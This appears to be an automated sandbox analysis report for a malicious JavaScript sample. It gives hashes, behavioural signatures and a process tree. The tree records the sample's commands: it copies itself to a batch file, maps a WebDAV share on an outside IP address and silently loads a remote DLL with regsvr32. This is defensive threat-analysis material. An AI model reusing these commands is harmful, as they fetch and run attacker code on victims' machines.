Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
125s -
max time network
129s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
09/07/2024, 06:12
Static task
static1
Behavioral task
behavioral1
Sample
3184579182140121556.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
3184579182140121556.js
Resource
win10v2004-20240704-en
General
-
Target
3184579182140121556.js
-
Size
5KB
-
MD5
a3a26691f23f506be74e72a6dc740959
-
SHA1
68d5263d0ffbec81e72c555a2f5a1ff911229676
-
SHA256
accbf5224b6054b92773326c22c560eec52d5302536bf9809c62810f59694fba
-
SHA512
0a5e694d359b435548fe328bfe472115c8bd5a423ba35f4eb905f30f50959c8a8770388902bd642401bdba38916a16cfed68ac40a573629b8f9f99e66b71370e
-
SSDEEP
96:b4EpzOOolLhgcjGhsmF5lBJ2aIhD7lA+qnkz:EI4ltgcj0sS5lBJ2aIhD7lA3nkz
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1692 wrote to memory of 4148 1692 wscript.exe 89 PID 1692 wrote to memory of 4148 1692 wscript.exe 89 PID 4148 wrote to memory of 4696 4148 cmd.exe 92 PID 4148 wrote to memory of 4696 4148 cmd.exe 92 PID 4148 wrote to memory of 1240 4148 cmd.exe 93 PID 4148 wrote to memory of 1240 4148 cmd.exe 93
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\3184579182140121556.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\3184579182140121556.js" "C:\Users\Admin\\lbdupt.bat" && "C:\Users\Admin\\lbdupt.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:4148 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:4696
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\890.dll3⤵PID:1240
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4388,i,5028538196072658126,13960315633709835247,262144 --variations-seed-version --mojo-platform-channel-handle=3896 /prefetch:81⤵PID:1472
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5a3a26691f23f506be74e72a6dc740959
SHA168d5263d0ffbec81e72c555a2f5a1ff911229676
SHA256accbf5224b6054b92773326c22c560eec52d5302536bf9809c62810f59694fba
SHA5120a5e694d359b435548fe328bfe472115c8bd5a423ba35f4eb905f30f50959c8a8770388902bd642401bdba38916a16cfed68ac40a573629b8f9f99e66b71370e